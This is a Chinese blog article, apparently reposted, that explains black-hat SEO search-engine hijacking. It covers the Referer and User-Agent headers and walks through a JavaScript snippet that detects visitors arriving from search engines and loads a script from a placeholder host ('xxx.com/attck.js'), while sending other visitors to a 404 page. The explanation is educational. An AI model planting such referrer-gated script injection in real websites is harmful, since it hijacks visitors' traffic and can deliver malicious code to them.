当前位置: 首页 > wzjs >正文

代理加盟网站asp.net做网站视频

代理加盟网站,asp.net做网站视频,做响应式网站设计图是多大的,成都网站建设及推广问题起源 这是在《Web安全深度剖析》的第二章“深入HTTP请求流程”的2.3章节“黑帽SEO之搜索引擎劫持”提到的内容,但是书中描述并不详细,没有讲如何攻击达到域名劫持的效果。 书中对SEO搜索引擎劫持的现象描述如下:直接输入网站的域名可以进…

问题起源

        这是在《Web安全深度剖析》的第二章“深入HTTP请求流程”的2.3章节“黑帽SEO之搜索引擎劫持”提到的内容,但是书中描述并不详细,没有讲如何攻击达到域名劫持的效果。

        书中对SEO搜索引擎劫持的现象描述如下:直接输入网站的域名可以进入网站,但是通过在百度或者谷歌等搜索引擎通过关键字看到自己的网站后,点击链接会跳转到其他网站,黑帽SEO利用HTTP协议中Referer和浏览器客户端User-agent字段来欺骗搜索引擎,这到底是如何做到的呢?

原始劫持步骤描述

        书中提到当用户通过百度或者谷歌搜索引擎打开网站时,一般会引出源页面(Referer消息头),利用这点就可以用任何Web语言进行针对搜索引擎的流量劫持,步骤如下:

        1.首先建立劫持搜索引擎库,比如以Baidu、Google等域名为关键字

        2.获取HTTP Referer首部信息。

        3.遍历搜索引擎库,并与referer的内容相比较,如果两者相同或者存在搜索引擎关键字,那么页面将会发生跳转,也就是域名劫持。

        对于书中这部分讲解,我认为讲解的很模糊,怎么比较Referer字段相同或者存在关键字就发生域名劫持,还有就是与UserAgent字段也没有关系啊,只在后面提了一句Useragent主要用于劫持搜索引擎的蜘蛛。整体来说书中P25页的内容比较抽象,看过只觉得云里雾里,没有逻辑性。

SEO域名劫持原理分析

HTTP协议

        这里我先介绍下HTTP协议中这两个字段的含义,对比如下表所示

字段RefererUser-Agent
作用表示当前请求是从哪个页面链接或跳转过来的标识请求的客户端(浏览器、爬虫、应用程序等)的软硬件信息
示例值Referer: https://example.com/page1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
示例含义

从 https://example.com/page1 点击链接跳转到 https://example.com/page2,则访问 page2 的请求中会包含:

Referer: https://example.com/page1

代表发起请求的客户端的软硬件信息为
Windows NT 10.0:操作系统为 Windows 10。
Chrome/120.0.0.0:浏览器为 Chrome 120 版本。
Safari/537.36:兼容 Safari 内核。
隐私问题可能泄露用户浏览历史可能泄露设备信息
是否可空直接输入地址访问时为空必须存在(但可伪造)

        基于此可知,如果我们在百度搜索"csdn",引擎搜索关键字看到的网站,打开csdn的网页链接,如下所示

        Referer一般应该为搜索关键字的页面(也就是对应的搜索引擎页面),内容大概如下所示

https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=csdn&fenlei=256&oq=csdn

分析攻击原理

        在原始劫持步骤的第三步中提到,当Referer的内容与搜索引擎库匹配时发生跳转,这是什么原理呢?由于Referer内容为搜索引擎的相关信息,为何匹配上就攻击成功呢,这是因为书中在讲解这个步骤时没有描述攻击脚本信息,假设有如下攻击脚本:

// 定义一个正则表达式,用于匹配常见的搜索引擎域名
// 匹配格式:.引擎名.后缀(如 .baidu.com、.google.com.hk)
// 修饰符:i(忽略大小写)、g(全局匹配)
var regexp = /\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|360|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;// 获取当前页面的来源页地址(即HTTP请求头中的Referer字段)
var where = document.referer;// 检查来源页地址是否匹配正则表达式(即是否来自搜索引擎)
if (regexp.test(where)) {// 如果来自搜索引擎,动态插入一个恶意脚本// 该脚本可能用于SEO作弊、流量劫持或攻击行为document.write('<script language="javascript" type="text/javascript" src="http://www.xxx.com/attck.js"></script>');
} else {// 如果不是来自搜索引擎,跳转到404页面(可能用于隐藏真实内容)window.location.href = "../../404.htm";
}

        该脚本通过检测HTTP请求的Referer字段,判断用户访问的网址来源是否来自搜索引擎(如百度、Google等)。如果匹配成功(即流量来自搜索引擎爬虫或搜索结果页跳转,代码来看就是egexp正则表达式中的关键字),则动态插入恶意JavaScript脚本(脚本中的挂马脚本src=”http://www.xxx.com/attck.js”),可能用于SEO作弊(如伪造内容、刷排名)、流量劫持(跳转至恶意网站)或注入攻击代码(如XSS、挖矿脚本)。而普通用户直接访问时,则会被重定向至404页面,使恶意内容仅对搜索引擎可见,从而实现Cloaking(伪装攻击),欺骗搜索引擎收录虚假内容,劫持搜索流量。这种手法属于黑帽SEO,严重违反搜索引擎规则,可能导致网站被降权或封禁。

总结

        综上所述,原始的步骤就可以解释通了,我们再来回顾下这个步骤,攻击过程可以拆解为 “检测来源 → 匹配搜索引擎 → 执行劫持”*三个阶段,具体如下:

1. 建立搜索引擎劫持库

- 通过脚本中的如下正则表达式来实现关键字的搜索引擎库

var regexp = /\.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|360|sm|sp)(\.[a-z0-9\-]+){1,2}\//ig;

  - 匹配的域名包括:`.baidu.com`、`.google.com.hk`、`.bing.com` 等。  
  - 匹配规则:  
    - `\.(引擎名)`:匹配域名中的搜索引擎关键字(如 `.baidu`)。  
    - `(\.[a-z0-9\-]+){1,2}`:匹配顶级域名(如 `.com`、`.com.hk`)。  

2. 获取并检测HTTP Referer字段

  浏览器在请求网页时会自动携带 `Referer` 字段,标明当前请求的来源页面。  
  - 例如:用户通过百度搜索结果页访问时,`Referer` 值为:  

Referer: https://www.baidu.com/link?url=xxx

这时使用脚本来匹配refer中字段是否包含搜索引擎相关的关键字,即可判断流量是否为搜索引擎流量。

3. 执行劫持:差异化响应攻击

  当流量被识别为来自搜索引擎时,脚本动态插入恶意代码可能导致SEO域名劫持等问题:  

document.write('<script src="http://www.xxx.com/attck.js"></script>');

        然而当不匹配搜索引擎时,比如只是普通用户则不发起攻击,这里脚本选择跳转到404页面, 目的应该是避免普通用户发现异常,仅对搜索引擎暴露恶意内容:  

  window.location.href = "../../404.htm";

综上所示,攻击流程如下所示: 



文章转载自:

http://SMcoJVVj.mhwtq.cn
http://Uc0p8G1a.mhwtq.cn
http://Pe2tyzJS.mhwtq.cn
http://lJ1w2SHL.mhwtq.cn
http://OyQBDcAe.mhwtq.cn
http://iNMqXNy6.mhwtq.cn
http://9wM8E6jJ.mhwtq.cn
http://YHCRTCnA.mhwtq.cn
http://uuOhNpBl.mhwtq.cn
http://yfYdff27.mhwtq.cn
http://etkloUqs.mhwtq.cn
http://sLhhzYPO.mhwtq.cn
http://5ngA29ze.mhwtq.cn
http://4bBGpkFF.mhwtq.cn
http://GMV1GQos.mhwtq.cn
http://z3GQQNvV.mhwtq.cn
http://pj7pPkYn.mhwtq.cn
http://AchBhti2.mhwtq.cn
http://ehecNpBO.mhwtq.cn
http://XPey6gm5.mhwtq.cn
http://02HUblEV.mhwtq.cn
http://hrSeon68.mhwtq.cn
http://i1GlDILv.mhwtq.cn
http://q9rjaZ7M.mhwtq.cn
http://VufXexNZ.mhwtq.cn
http://3BbaGXVJ.mhwtq.cn
http://OuRPCS52.mhwtq.cn
http://KC8Jeeh8.mhwtq.cn
http://5FRfAsVk.mhwtq.cn
http://7CtqUatu.mhwtq.cn
http://www.dtcms.com/wzjs/642076.html

相关文章:

  • 做外账要登什么网站郑州商城网站制作
  • 无水印做海报的网站东莞南城网站设计
  • 网站开发公司地址wordpress匿名头像
  • 住房和城乡建设部执法网站在服务器网站上做跳转页面
  • 高培淇自己做的网站凡客诚品倒闭了吗
  • 网站建设步骤电脑2018年期刊网站建设调查
  • 网站问责建设书wordpress 如何修改模板底部
  • 网站建设设计书上海哪里有网站建设
  • 企业网站改版seo苏州园区属于哪个区
  • 电子商务网站建设与管理试卷6帮人做网站要怎么赚钱
  • 番禺网站开发哪家专业专门做前端项目的一些网站
  • 网站怎么做内部链接番禺建设网站外包
  • 自己怎么做网址开网站做海报免费素材网站有哪些
  • 桐乡住房和城乡规划建设局网站定制网站的价格低
  • 国外博客写作网站oa系统主要干什么的
  • 登封网站设计WordPress怎么更改主题名称
  • 太原网站优化怎么做龙江人社app二维码图片
  • 自己怎么建立个人网站龙华网站建设主要工作
  • 个人做网站需要注意什么企业查询系统官网入口
  • 建设通银行官方网站设计很好的视觉很棒的网站
  • 苏州建设造价信息网站网页版传奇怎么开
  • 温州建站方案从零开始网站建设
  • 织梦免费企业模板网站网站开发属于程序员吗
  • 个人博客网站建设浏览器无法打开住房和建设网站
  • 网站建设项目报告书网站建设理论
  • 企业网站的主要功能企业培训课程一览表
  • 代码模版 网站做网页的心得体会
  • 一级a做爰片免播放器网站湖南软件定制开发
  • 用qt做网站可以吗App加网站什么做
  • 上海网络公司网站建设多用户建站系统源码